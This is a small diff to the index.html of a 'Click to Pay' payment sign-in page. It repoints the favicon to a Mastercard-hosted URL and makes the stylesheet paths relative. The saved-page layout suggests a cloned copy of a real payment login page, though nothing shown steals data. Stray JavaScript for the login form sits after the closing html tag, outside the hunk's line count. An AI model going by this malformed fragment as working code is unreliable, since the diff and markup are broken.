--- a/public/index.html
+++ b/public/index.html
@@ -4,11 +4,11 @@
   <meta charset="UTF-8" />
   <meta name="viewport" content="width=device-width, initial-scale=1, viewport-fit=cover" />
   <meta name="description" content="Create a payment profile or sign in with Click to Pay" />
-  <link rel="icon" href="/favicon.ico" />
+  <link rel="icon" href="https://src.mastercard.com/profile/favicon.ico" />
   <title>Click to Pay</title>
 
-  <link rel="stylesheet" href="/style.css" />
-  <link rel="stylesheet" href="/index_files/index.d9994029.css" />
+  <link rel="stylesheet" href="style.css" />
+  <link rel="stylesheet" href="index_files/index.d9994029.css" />
 </head>
 <body>
   <div class="root-container">
@@ -110,6 +110,7 @@
 <script type="module" src="/src/main.js"></script>
 </body>
 </html>
+
       const input = document.getElementById('userId');
       const button = document.getElementById('submit-btn');
       const form = document.getElementById('login-form');
